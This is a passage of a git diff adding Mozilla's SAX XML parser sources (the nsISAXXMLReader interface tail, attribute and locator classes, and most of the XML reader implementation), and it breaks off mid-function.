http://xml.org/sax/features/namespace-prefixes feature names. + * + * @param name String flag for a parser feature. + * + * @note This is currently supported only for + * http://xml.org/sax/features/namespace-prefixes . All other + * features will result in a NOT_IMPLEMENTED exception. + */ + boolean getFeature(in AString name); + + /** + * Set the value of a property. NOT CURRENTLY IMPLEMENTED. + * + * The property name is any fully-qualified URI. It is possible + * for an XMLReader to recognize a property name but to be unable to + * change the current value. Some property values may be immutable + * or mutable only in specific contexts, such as before, during, or + * after a parse. + * + * XMLReaders are not required to recognize setting any specific + * property names, though a core set is defined by SAX2. + * + * This method is also the standard mechanism for setting + * extended handlers. + * + * @param name String flag for a parser feature + * @param value Turn the feature on/off. + */ + void setProperty(in AString name, in nsISupports value); + + /** + * Look up the value of a property. NOT CURRENTLY IMPLEMENTED. + * + * The property name is any fully-qualified URI. It is + * possible for an XMLReader to recognize a property name but + * temporarily be unable to return its value. + * Some property values may be available only in specific + * contexts, such as before, during, or after a parse. + * + * XMLReaders are not required to recognize any specific + * property names, though an initial core set is documented for + * SAX2. + * + * Implementors are free (and encouraged) to invent their own properties, + * using names built on their own URIs. + * + * @param name The property name, which is a fully-qualified URI. + * @return The current value of the property. + */ + boolean getProperty(in AString name); + + /** + * + * @param str The UTF16 string to be parsed + * @param contentType The content type of the string (see parseFromStream) + * + */ + void parseFromString(in AString str, in string contentType); + + /** + * + * @param stream The byte stream whose contents are parsed + * @param charset The character set that was used to encode the byte + * stream. NULL if not specified. + * @param contentType The content type of the string - either text/xml, + * application/xml, or application/xhtml+xml. + * Must not be NULL. + * + */ + void parseFromStream(in nsIInputStream stream, + in string charset, + in string contentType); + + /** + * Begin an asynchronous parse. This method initializes the parser, + * and must be called before any nsIStreamListener methods. It is + * then the caller's duty to call nsIStreamListener methods to drive + * the parser. Once this method is called, the caller must not call + * one of the other parse methods. + * + * @param observer The nsIRequestObserver to notify upon start or stop. + * Can be NULL. + */ + void parseAsync(in nsIRequestObserver observer); +}; diff --git a/parser/xml/nsSAXAttributes.cpp b/parser/xml/nsSAXAttributes.cpp new file mode 100644 index 000000000..3984186e4 --- /dev/null +++ b/parser/xml/nsSAXAttributes.cpp @@ -0,0 +1,332 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsSAXAttributes.h" + +NS_IMPL_ISUPPORTS(nsSAXAttributes, nsISAXAttributes, nsISAXMutableAttributes) + +NS_IMETHODIMP +nsSAXAttributes::GetIndexFromName(const nsAString &aURI, + const nsAString &aLocalName, + int32_t *aResult) +{ + int32_t len = mAttrs.Length(); + int32_t i; + for (i = 0; i < len; ++i) { + const SAXAttr &att = mAttrs[i]; + if (att.localName.Equals(aLocalName) && att.uri.Equals(aURI)) { + *aResult = i; + return NS_OK; + } + } + *aResult = -1; + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetIndexFromQName(const nsAString &aQName, int32_t *aResult) +{ + int32_t len = mAttrs.Length(); + int32_t i; + for (i = 0; i < len; ++i) { + const SAXAttr &att = mAttrs[i]; + if (att.qName.Equals(aQName)) { + *aResult = i; + return NS_OK; + } + } + *aResult = -1; + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetLength(int32_t *aResult) +{ + *aResult = mAttrs.Length(); + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetLocalName(uint32_t aIndex, nsAString &aResult) +{ + uint32_t len = mAttrs.Length(); + if (aIndex >= len) { + aResult.SetIsVoid(true); + } else { + const SAXAttr &att = mAttrs[aIndex]; + aResult = att.localName; + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetQName(uint32_t aIndex, nsAString &aResult) +{ + uint32_t len = mAttrs.Length(); + if (aIndex >= len) { + aResult.SetIsVoid(true); + } else { + const SAXAttr &att = mAttrs[aIndex]; + aResult = att.qName; + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetType(uint32_t aIndex, nsAString &aResult) +{ + uint32_t len = mAttrs.Length(); + if (aIndex >= len) { + aResult.SetIsVoid(true); + } else { + const SAXAttr &att = mAttrs[aIndex]; + aResult = att.type; + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetTypeFromName(const nsAString &aURI, + const nsAString &aLocalName, + nsAString &aResult) +{ + int32_t index = -1; + GetIndexFromName(aURI, aLocalName, &index); + if (index >= 0) { + aResult = mAttrs[index].type; + } else { + aResult.SetIsVoid(true); + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetTypeFromQName(const nsAString &aQName, nsAString &aResult) +{ + int32_t index = -1; + GetIndexFromQName(aQName, &index); + if (index >= 0) { + aResult = mAttrs[index].type; + } else { + aResult.SetIsVoid(true); + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetURI(uint32_t aIndex, nsAString &aResult) +{ + uint32_t len = mAttrs.Length(); + if (aIndex >= len) { + aResult.SetIsVoid(true); + } else { + const SAXAttr &att = mAttrs[aIndex]; + aResult = att.uri; + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetValue(uint32_t aIndex, nsAString &aResult) +{ + uint32_t len = mAttrs.Length(); + if (aIndex >= len) { + aResult.SetIsVoid(true); + } else { + const SAXAttr &att = mAttrs[aIndex]; + aResult = att.value; + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetValueFromName(const nsAString &aURI, + const nsAString &aLocalName, + nsAString &aResult) +{ + int32_t index = -1; + GetIndexFromName(aURI, aLocalName, &index); + if (index >= 0) { + aResult = mAttrs[index].value; + } else { + aResult.SetIsVoid(true); + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetValueFromQName(const nsAString &aQName, + nsAString &aResult) +{ + int32_t index = -1; + GetIndexFromQName(aQName, &index); + if (index >= 0) { + aResult = mAttrs[index].value; + } else { + aResult.SetIsVoid(true); + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::AddAttribute(const nsAString &aURI, + const nsAString &aLocalName, + const nsAString &aQName, + const nsAString &aType, + const nsAString &aValue) +{ + SAXAttr *att = mAttrs.AppendElement(); + if (!att) { + return NS_ERROR_OUT_OF_MEMORY; + } + + att->uri = aURI; + att->localName = aLocalName; + att->qName = aQName; + att->type = aType; + att->value = aValue; + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::Clear() +{ + mAttrs.Clear(); + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::RemoveAttribute(uint32_t aIndex) +{ + if (aIndex >= mAttrs.Length()) { + return NS_ERROR_FAILURE; + } + mAttrs.RemoveElementAt(aIndex); + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::SetAttributes(nsISAXAttributes *aAttributes) +{ + NS_ENSURE_ARG(aAttributes); + + nsresult rv; + int32_t len; + rv = aAttributes->GetLength(&len); + NS_ENSURE_SUCCESS(rv, rv); + + mAttrs.Clear(); + SAXAttr *att; + int32_t i; + for (i = 0; i < len; ++i) { + att = mAttrs.AppendElement(); + if (!att) { + return NS_ERROR_OUT_OF_MEMORY; + } + rv = aAttributes->GetURI(i, att->uri); + NS_ENSURE_SUCCESS(rv, rv); + rv = aAttributes->GetLocalName(i, att->localName); + NS_ENSURE_SUCCESS(rv, rv); + rv = aAttributes->GetQName(i, att->qName); + NS_ENSURE_SUCCESS(rv, rv); + rv = aAttributes->GetType(i, att->type); + NS_ENSURE_SUCCESS(rv, rv); + rv = aAttributes->GetValue(i, att->value); + NS_ENSURE_SUCCESS(rv, rv); + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::SetAttribute(uint32_t aIndex, + const nsAString &aURI, + const nsAString &aLocalName, + const nsAString &aQName, + const nsAString &aType, + const nsAString &aValue) +{ + if (aIndex >= mAttrs.Length()) { + return NS_ERROR_FAILURE; + } + + SAXAttr &att = mAttrs[aIndex]; + att.uri = aURI; + att.localName = aLocalName; + att.qName = aQName; + att.type = aType; + att.value = aValue; + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::SetLocalName(uint32_t aIndex, const nsAString &aLocalName) +{ + if (aIndex >= mAttrs.Length()) { + return NS_ERROR_FAILURE; + } + mAttrs[aIndex].localName = aLocalName; + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::SetQName(uint32_t aIndex, const nsAString &aQName) +{ + if (aIndex >= mAttrs.Length()) { + return NS_ERROR_FAILURE; + } + mAttrs[aIndex].qName = aQName; + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::SetType(uint32_t aIndex, const nsAString &aType) +{ + if (aIndex >= mAttrs.Length()) { + return NS_ERROR_FAILURE; + } + mAttrs[aIndex].type = aType; + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::SetURI(uint32_t aIndex, const nsAString &aURI) +{ + if (aIndex >= mAttrs.Length()) { + return NS_ERROR_FAILURE; + } + mAttrs[aIndex].uri = aURI; + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::SetValue(uint32_t aIndex, const nsAString &aValue) +{ + if (aIndex >= mAttrs.Length()) { + return NS_ERROR_FAILURE; + } + mAttrs[aIndex].value = aValue; + + return NS_OK; +} diff --git a/parser/xml/nsSAXAttributes.h b/parser/xml/nsSAXAttributes.h new file mode 100644 index 000000000..f8da6f8a1 --- /dev/null +++ b/parser/xml/nsSAXAttributes.h @@ -0,0 +1,43 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#ifndef nsSAXAttributes_h__ +#define nsSAXAttributes_h__ + +#include "nsISupports.h" +#include "nsISAXAttributes.h" +#include "nsISAXMutableAttributes.h" +#include "nsTArray.h" +#include "nsString.h" +#include "mozilla/Attributes.h" + +#define NS_SAXATTRIBUTES_CONTRACTID "@mozilla.org/saxparser/attributes;1" +#define NS_SAXATTRIBUTES_CID \ +{/* {7bb40992-77eb-43db-9a4e-39d3bcc483ae}*/ \ +0x7bb40992, 0x77eb, 0x43db, \ +{ 0x9a, 0x4e, 0x39, 0xd3, 0xbc, 0xc3, 0x83, 0xae} } + +struct SAXAttr +{ + nsString uri; + nsString localName; + nsString qName; + nsString type; + nsString value; +}; + +class nsSAXAttributes final : public nsISAXMutableAttributes +{ +public: + NS_DECL_ISUPPORTS + NS_DECL_NSISAXATTRIBUTES + NS_DECL_NSISAXMUTABLEATTRIBUTES + +private: + ~nsSAXAttributes() {} + nsTArray<SAXAttr> mAttrs; +}; + +#endif // nsSAXAttributes_h__ diff --git a/parser/xml/nsSAXLocator.cpp b/parser/xml/nsSAXLocator.cpp new file mode 100644 index 000000000..16a056ac6 --- /dev/null +++ b/parser/xml/nsSAXLocator.cpp @@ -0,0 +1,47 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsSAXLocator.h" + +NS_IMPL_ISUPPORTS(nsSAXLocator, nsISAXLocator) + +nsSAXLocator::nsSAXLocator(nsString& aPublicId, + nsString& aSystemId, + int32_t aLineNumber, + int32_t aColumnNumber) : + mPublicId(aPublicId), + mSystemId(aSystemId), + mLineNumber(aLineNumber), + mColumnNumber(aColumnNumber) +{ +} + +NS_IMETHODIMP +nsSAXLocator::GetColumnNumber(int32_t *aColumnNumber) +{ + *aColumnNumber = mColumnNumber; + return NS_OK; +} + +NS_IMETHODIMP +nsSAXLocator::GetLineNumber(int32_t *aLineNumber) +{ + *aLineNumber = mLineNumber; + return NS_OK; +} + +NS_IMETHODIMP +nsSAXLocator::GetPublicId(nsAString &aPublicId) +{ + aPublicId = mPublicId; + return NS_OK; +} + +NS_IMETHODIMP +nsSAXLocator::GetSystemId(nsAString &aSystemId) +{ + aSystemId = mSystemId; + return NS_OK; +} diff --git a/parser/xml/nsSAXLocator.h b/parser/xml/nsSAXLocator.h new file mode 100644 index 000000000..14b9ef063 --- /dev/null +++ b/parser/xml/nsSAXLocator.h @@ -0,0 +1,39 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#ifndef nsSAXLocator_h__ +#define nsSAXLocator_h__ + +#include "nsISAXLocator.h" +#include "nsString.h" +#include "mozilla/Attributes.h" + +#define NS_SAXLOCATOR_CONTRACTID "@mozilla.org/saxparser/locator;1" +#define NS_SAXLOCATOR_CID \ +{/* {c1cd4045-846b-43bb-a95e-745a3d7b40e0}*/ \ +0xc1cd4045, 0x846b, 0x43bb, \ +{ 0xa9, 0x5e, 0x74, 0x5a, 0x3d, 0x7b, 0x40, 0xe0} } + +class nsSAXLocator final : public nsISAXLocator +{ +public: + NS_DECL_ISUPPORTS + NS_DECL_NSISAXLOCATOR + + nsSAXLocator(nsString& aPublicId, + nsString& aSystemId, + int32_t aLineNumber, + int32_t aColumnNumber); + +private: + ~nsSAXLocator() {} + + nsString mPublicId; + nsString mSystemId; + int32_t mLineNumber; + int32_t mColumnNumber; +}; + +#endif //nsSAXLocator_h__ diff --git a/parser/xml/nsSAXXMLReader.cpp b/parser/xml/nsSAXXMLReader.cpp new file mode 100644 index 000000000..a84e0d63b --- /dev/null +++ b/parser/xml/nsSAXXMLReader.cpp @@ -0,0 +1,719 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsIInputStream.h" +#include "nsNetCID.h" +#include "nsNetUtil.h" +#include "nsNullPrincipal.h" +#include "nsIParser.h" +#include "nsParserCIID.h" +#include "nsStreamUtils.h" +#include "nsStringStream.h" +#include "nsIScriptError.h" +#include "nsSAXAttributes.h" +#include "nsSAXLocator.h" +#include "nsSAXXMLReader.h" +#include "nsCharsetSource.h" + +#include "mozilla/dom/EncodingUtils.h" + +using mozilla::dom::EncodingUtils; + +#define XMLNS_URI "http://www.w3.org/2000/xmlns/" + +static NS_DEFINE_CID(kParserCID, NS_PARSER_CID); + +NS_IMPL_CYCLE_COLLECTION(nsSAXXMLReader, + mContentHandler, + mDTDHandler, + mErrorHandler, + mLexicalHandler, + mDeclarationHandler, + mBaseURI, + mListener, + mParserObserver) +NS_IMPL_CYCLE_COLLECTING_ADDREF(nsSAXXMLReader) +NS_IMPL_CYCLE_COLLECTING_RELEASE(nsSAXXMLReader) +NS_INTERFACE_MAP_BEGIN_CYCLE_COLLECTION(nsSAXXMLReader) + NS_INTERFACE_MAP_ENTRY(nsISAXXMLReader) + NS_INTERFACE_MAP_ENTRY(nsIExpatSink) + NS_INTERFACE_MAP_ENTRY(nsIExtendedExpatSink) + NS_INTERFACE_MAP_ENTRY(nsIContentSink) + NS_INTERFACE_MAP_ENTRY(nsIRequestObserver) + NS_INTERFACE_MAP_ENTRY(nsIStreamListener) + NS_INTERFACE_MAP_ENTRY_AMBIGUOUS(nsISupports, nsISAXXMLReader) +NS_INTERFACE_MAP_END + +nsSAXXMLReader::nsSAXXMLReader() : + mIsAsyncParse(false), + mEnableNamespacePrefixes(false) +{ +} + +// nsIContentSink +NS_IMETHODIMP +nsSAXXMLReader::WillBuildModel(nsDTDMode) +{ + if (mContentHandler) + return mContentHandler->StartDocument(); + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::DidBuildModel(bool aTerminated) +{ + if (mContentHandler) + return mContentHandler->EndDocument(); + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::SetParser(nsParserBase *aParser) +{ + return NS_OK; +} + +// nsIExtendedExpatSink +NS_IMETHODIMP +nsSAXXMLReader::HandleStartElement(const char16_t *aName, + const char16_t **aAtts, + uint32_t aAttsCount, + uint32_t aLineNumber) +{ + if (!mContentHandler) + return NS_OK; + + RefPtr<nsSAXAttributes> atts = new nsSAXAttributes(); + if (!atts) + return NS_ERROR_OUT_OF_MEMORY; + nsAutoString uri, localName, qName; + for (; *aAtts; aAtts += 2) { + SplitExpatName(aAtts[0], uri, localName, qName); + // XXX don't have attr type information + NS_NAMED_LITERAL_STRING(cdataType, "CDATA"); + // could support xmlns reporting, it's a standard SAX feature + if (mEnableNamespacePrefixes || !uri.EqualsLiteral(XMLNS_URI)) { + NS_ASSERTION(aAtts[1], "null passed to handler"); + atts->AddAttribute(uri, localName, qName, cdataType, + nsDependentString(aAtts[1])); + } + } + + // Deal with the element name + SplitExpatName(aName, uri, localName, qName); + return mContentHandler->StartElement(uri, localName, qName, atts); +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleEndElement(const char16_t *aName) +{ + if (mContentHandler) { + nsAutoString uri, localName, qName; + SplitExpatName(aName, uri, localName, qName); + return mContentHandler->EndElement(uri, localName, qName); + } + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleComment(const char16_t *aName) +{ + NS_ASSERTION(aName, "null passed to handler"); + if (mLexicalHandler) + return mLexicalHandler->Comment(nsDependentString(aName)); + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleCDataSection(const char16_t *aData, + uint32_t aLength) +{ + nsresult rv; + if (mLexicalHandler) { + rv = mLexicalHandler->StartCDATA(); + NS_ENSURE_SUCCESS(rv, rv); + } + + if (mContentHandler) { + rv = mContentHandler->Characters(Substring(aData, aData+aLength)); + NS_ENSURE_SUCCESS(rv, rv); + } + + if (mLexicalHandler) { + rv = mLexicalHandler->EndCDATA(); + NS_ENSURE_SUCCESS(rv, rv); + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleStartDTD(const char16_t *aName, + const char16_t *aSystemId, + const char16_t *aPublicId) +{ + char16_t nullChar = char16_t(0); + if (!aName) + aName = &nullChar; + if (!aSystemId) + aSystemId = &nullChar; + if (!aPublicId) + aPublicId = &nullChar; + + mSystemId = aSystemId; + mPublicId = aPublicId; + if (mLexicalHandler) { + return mLexicalHandler->StartDTD(nsDependentString(aName), + nsDependentString(aPublicId), + nsDependentString(aSystemId)); + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleDoctypeDecl(const nsAString & aSubset, + const nsAString & aName, + const nsAString & aSystemId, + const nsAString & aPublicId, + nsISupports* aCatalogData) +{ + if (mLexicalHandler) + return mLexicalHandler->EndDTD(); + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleCharacterData(const char16_t *aData, + uint32_t aLength) +{ + if (mContentHandler) + return mContentHandler->Characters(Substring(aData, aData+aLength)); + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleStartNamespaceDecl(const char16_t *aPrefix, + const char16_t *aUri) +{ + if (!mContentHandler) + return NS_OK; + + char16_t nullChar = char16_t(0); + if (!aPrefix) + aPrefix = &nullChar; + if (!aUri) + aUri = &nullChar; + + return mContentHandler->StartPrefixMapping(nsDependentString(aPrefix), + nsDependentString(aUri)); +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleEndNamespaceDecl(const char16_t *aPrefix) +{ + if (!mContentHandler) + return NS_OK; + + if (aPrefix) + return mContentHandler->EndPrefixMapping(nsDependentString(aPrefix)); + + return mContentHandler->EndPrefixMapping(EmptyString()); +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleProcessingInstruction(const char16_t *aTarget, + const char16_t *aData) +{ + NS_ASSERTION(aTarget && aData, "null passed to handler"); + if (mContentHandler) { + return mContentHandler->ProcessingInstruction(nsDependentString(aTarget), + nsDependentString(aData)); + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleNotationDecl(const char16_t *aNotationName, + const char16_t *aSystemId, + const char16_t *aPublicId) +{ + NS_ASSERTION(aNotationName, "null passed to handler"); + if (mDTDHandler) { + char16_t nullChar = char16_t(0); + if (!aSystemId) + aSystemId = &nullChar; + if (!aPublicId) + aPublicId = &nullChar; + + return mDTDHandler->NotationDecl(nsDependentString(aNotationName), + nsDependentString(aSystemId), + nsDependentString(aPublicId)); + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleUnparsedEntityDecl(const char16_t *aEntityName, + const char16_t *aSystemId, + const char16_t *aPublicId, + const char16_t *aNotationName) +{ + NS_ASSERTION(aEntityName && aNotationName, "null passed to handler"); + if (mDTDHandler) { + char16_t nullChar = char16_t(0); + if (!aSystemId) + aSystemId = &nullChar; + if (!aPublicId) + aPublicId = &nullChar; + + return mDTDHandler->UnparsedEntityDecl(nsDependentString(aEntityName), + nsDependentString(aSystemId), + nsDependentString(aPublicId), + nsDependentString(aNotationName)); + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleXMLDeclaration(const char16_t *aVersion, + const char16_t *aEncoding, + int32_t aStandalone) +{ + NS_ASSERTION(aVersion, "null passed to handler"); + if (mDeclarationHandler) { + char16_t nullChar = char16_t(0); + if (!aEncoding) + aEncoding = &nullChar; + mDeclarationHandler->HandleXMLDeclaration(nsDependentString(aVersion), + nsDependentString(aEncoding), + aStandalone > 0); + } + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::ReportError(const char16_t* aErrorText, + const char16_t* aSourceText, + nsIScriptError *aError, + bool *_retval) +{ + NS_PRECONDITION(aError && aSourceText && aErrorText, "Check arguments!!!"); + // Normally, the expat driver should report the error. + *_retval = true; + + if (mErrorHandler) { + uint32_t lineNumber; + nsresult rv = aError->GetLineNumber(&lineNumber); + NS_ENSURE_SUCCESS(rv, rv); + + uint32_t columnNumber; + rv = aError->GetColumnNumber(&columnNumber); + NS_ENSURE_SUCCESS(rv, rv); + + nsCOMPtr<nsISAXLocator> locator = new nsSAXLocator(mPublicId, + mSystemId, + lineNumber, + columnNumber); + if (!locator) + return NS_ERROR_OUT_OF_MEMORY; + + rv = mErrorHandler->FatalError(locator, nsDependentString(aErrorText)); + if (NS_SUCCEEDED(rv)) { + // The error handler has handled the script error. Don't log to console. + *_retval = false; + } + } + + return NS_OK; +} + +// nsISAXXMLReader + +NS_IMETHODIMP +nsSAXXMLReader::GetBaseURI(nsIURI **aBaseURI) +{ + NS_IF_ADDREF(*aBaseURI = mBaseURI); + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::SetBaseURI(nsIURI *aBaseURI) +{ + mBaseURI = aBaseURI; + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::GetContentHandler(nsISAXContentHandler **aContentHandler) +{ + NS_IF_ADDREF(*aContentHandler = mContentHandler); + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::SetContentHandler(nsISAXContentHandler *aContentHandler) +{ + mContentHandler = aContentHandler; + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::GetDtdHandler(nsISAXDTDHandler **aDtdHandler) +{ + NS_IF_ADDREF(*aDtdHandler = mDTDHandler); + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::SetDtdHandler(nsISAXDTDHandler *aDtdHandler) +{ + mDTDHandler = aDtdHandler; + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::GetErrorHandler(nsISAXErrorHandler **aErrorHandler) +{ + NS_IF_ADDREF(*aErrorHandler = mErrorHandler); + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::SetErrorHandler(nsISAXErrorHandler *aErrorHandler) +{ + mErrorHandler = aErrorHandler; + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::SetFeature(const nsAString &aName, bool aValue) +{ + if (aName.EqualsLiteral("http://xml.org/sax/features/namespace-prefixes")) { + mEnableNamespacePrefixes = aValue; + return NS_OK; + } + return NS_ERROR_NOT_IMPLEMENTED; +} + +NS_IMETHODIMP +nsSAXXMLReader::GetFeature(const nsAString &aName, bool *aResult) +{ + if (aName.EqualsLiteral("http://xml.org/sax/features/namespace-prefixes")) { + *aResult = mEnableNamespacePrefixes; + return NS_OK; + } + return NS_ERROR_NOT_IMPLEMENTED; +} + +NS_IMETHODIMP +nsSAXXMLReader::GetDeclarationHandler(nsIMozSAXXMLDeclarationHandler **aDeclarationHandler) { + NS_IF_ADDREF(*aDeclarationHandler = mDeclarationHandler); + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::SetDeclarationHandler(nsIMozSAXXMLDeclarationHandler *aDeclarationHandler) { + mDeclarationHandler = aDeclarationHandler; + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::GetLexicalHandler(nsISAXLexicalHandler **aLexicalHandler) +{ + NS_IF_ADDREF(*aLexicalHandler = mLexicalHandler); + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::SetLexicalHandler(nsISAXLexicalHandler *aLexicalHandler) +{ + mLexicalHandler = aLexicalHandler; + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::SetProperty(const nsAString &aName, nsISupports* aValue) +{ + return NS_ERROR_NOT_IMPLEMENTED; +} + +NS_IMETHODIMP +nsSAXXMLReader::GetProperty(const nsAString &aName, bool *aResult) +{ + return NS_ERROR_NOT_IMPLEMENTED; +} + +NS_IMETHODIMP +nsSAXXMLReader::ParseFromString(const nsAString &aStr, + const char *aContentType) +{ + // Don't call this in the middle of an async parse + NS_ENSURE_TRUE(!mIsAsyncParse, NS_ERROR_FAILURE); + + NS_ConvertUTF16toUTF8 data(aStr); + + // The new stream holds a reference to the buffer + nsCOMPtr<nsIInputStream> stream; + nsresult rv = NS_NewByteInputStream(getter_AddRefs(stream), + data.get(), data.Length(), + NS_ASSIGNMENT_DEPEND); + NS_ENSURE_SUCCESS(rv, rv); + return ParseFromStream(stream, "UTF-8", aContentType); +} + +NS_IMETHODIMP +nsSAXXMLReader::ParseFromStream(nsIInputStream *aStream, + const char *aCharset, + const char *aContentType) +{ + // Don't call this in the middle of an async parse + NS_ENSURE_TRUE(!mIsAsyncParse, NS_ERROR_FAILURE); + + NS_ENSURE_ARG(aStream); + NS_ENSURE_ARG(aContentType); + + // Put the nsCOMPtr out here so we hold a ref to the stream as needed + nsresult rv; + nsCOMPtr<nsIInputStream> bufferedStream; + if (!NS_InputStreamIsBuffered(aStream)) { + rv = NS_NewBufferedInputStream(getter_AddRefs(bufferedStream), + aStream, 4096); + NS_ENSURE_SUCCESS(rv, rv); + aStream = bufferedStream; + } + + rv = EnsureBaseURI(); + NS_ENSURE_SUCCESS(rv, rv); + + nsCOMPtr<nsIPrincipal> nullPrincipal = nsNullPrincipal::Create(); + + // The following channel is never openend, so it does not matter what + // securityFlags we pass; let's follow the principle of least privilege. + nsCOMPtr<nsIChannel> parserChannel; + rv = NS_NewInputStreamChannel(getter_AddRefs(parserChannel), + mBaseURI, + aStream, + nullPrincipal, + nsILoadInfo::SEC_REQUIRE_SAME_ORIGIN_DATA_IS_BLOCKED, + nsIContentPolicy::TYPE_OTHER, + nsDependentCString(aContentType)); + if (!parserChannel || NS_FAILED(rv)) + return NS_ERROR_FAILURE; + + if (aCharset) + parserChannel->SetContentCharset(nsDependentCString(aCharset)); + + rv = InitParser(nullptr, parserChannel); + NS_ENSURE_SUCCESS(rv, rv); + + rv = mListener->OnStartRequest(parserChannel, nullptr); + if (NS_FAILED(rv)) + parserChannel->Cancel(rv); + + /* When parsing a new document, we need to clear the XML identifiers. + HandleStartDTD will set these values from the DTD declaration tag. + We won't have them, of course, if there's a well-formedness error + before the DTD tag (such as a space before an XML declaration). + */ + mSystemId.Truncate(); + mPublicId.Truncate(); + + nsresult status; + parserChannel->GetStatus(&status); + + uint64_t offset = 0; + while (NS_SUCCEEDED(rv) && NS_SUCCEEDED(status)) { + uint64_t available; + rv = aStream->Available(&available); + if (rv == NS_BASE_STREAM_CLOSED) { + rv = NS_OK; + available = 0; + } + if (NS_FAILED(rv)) { + parserChannel->Cancel(rv); + break; + } + if (! available) + break; // blocking input stream has none available when done + + if (available > UINT32_MAX) + available = UINT32_MAX; + + rv = mListener->OnDataAvailable(parserChannel, nullptr, + aStream, + offset, + (uint32_t)available); + if (NS_SUCCEEDED(rv)) + offset += available; + else + parserChannel->Cancel(rv); + parserChannel->GetStatus(&status); + } + rv = mListener->OnStopRequest(parserChannel, nullptr, status); + mListener = nullptr; + + return rv; +} + +NS_IMETHODIMP +nsSAXXMLReader::ParseAsync(nsIRequestObserver *aObserver) +{ + mParserObserver = aObserver; + mIsAsyncParse = true; + return NS_OK; +} + +// nsIRequestObserver + +NS_IMETHODIMP +nsSAXXMLReader::OnStartRequest(nsIRequest *aRequest, nsISupports *aContext) +{ + NS_ENSURE_TRUE(mIsAsyncParse, NS_ERROR_FAILURE); + nsresult rv; + rv = EnsureBaseURI(); + NS_ENSURE_SUCCESS(rv, rv); + nsCOMPtr<nsIChannel> channel = do_QueryInterface(aRequest); + rv = InitParser(mParserObserver, channel); + NS_ENSURE_SUCCESS(rv, rv); + // we don't need or want this anymore + mParserObserver = nullptr; + return mListener->OnStartRequest(aRequest, aContext); +} + +NS_IMETHODIMP +nsSAXXMLReader::OnStopRequest(nsIRequest *aRequest, nsISupports *aContext, + nsresult status) +{ + NS_ENSURE_TRUE(mIsAsyncParse, NS_ERROR_FAILURE); + 